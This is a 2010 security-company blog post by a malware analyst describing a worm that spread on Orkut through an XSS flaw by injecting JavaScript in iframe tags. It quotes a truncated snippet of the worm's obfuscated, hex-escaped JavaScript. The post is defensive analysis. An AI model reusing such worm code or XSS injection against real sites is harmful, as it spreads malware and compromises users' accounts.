Nirmal Singh Bhary

Nirmal Singh Bhary's entries

Senior Malware Analyst

He is the team leader of Analysis India and has worked in Norman since 2009. He has 3 years of experience from development and analysis.
He is particularly interested in polymorphic virus, rootkits and system programming.

Orkut Worm spreading through XSS loophole Comment [0]

Nirmal Singh Bhary September 29, 2010

Orkut, a popular social networking site, was hit by a new worm on Saturday, September 25, 2010. The worm uses a XSS exploit on the Orkut website that allows malware writers to inject malicious javascript files using iframe tags in the scrap text. The body the scrap text will read “Bom Sabado!”

In fig 1 you can see the html code of the infected scrap.

Fig1 Infected Scrap

Given below is a portion of JavaScript code file
var _0x37a1=["x4Dx69x63x72x6Fx73x6Fx66x74x2Ex58x4Dx4Cx48x74x74x70","x50x4Fx53x54x5Fx54x4Fx4Bx45x4Ex3D…

Blog tags: General security

Spam (10)

Vulnerabilities / Exploits (33)

Blog archive

August 2011 (1)

June 2011 (1)

May 2011 (2)

April 2011 (5)

March 2011 (5)

February 2011 (4)

January 2011 (11)

December 2010 (8)

November 2010 (5)

October 2010 (3)

September 2010 (5)

August 2010 (5)

July 2010 (3)

June 2010 (12)

May 2010 (5)

April 2010 (2)

March 2010 (2)

February 2010 (1)

January 2010 (2)

December 2009 (1)

October 2009 (5)

September 2009 (4)

August 2009 (1)

June 2009 (1)

May 2009 (3)

April 2009 (2)

March 2009 (8)

February 2009 (4)

January 2009 (2)

November 2008 (6)

October 2008 (5)

RSS FEEDS

Latest Security articles

Latest Blog items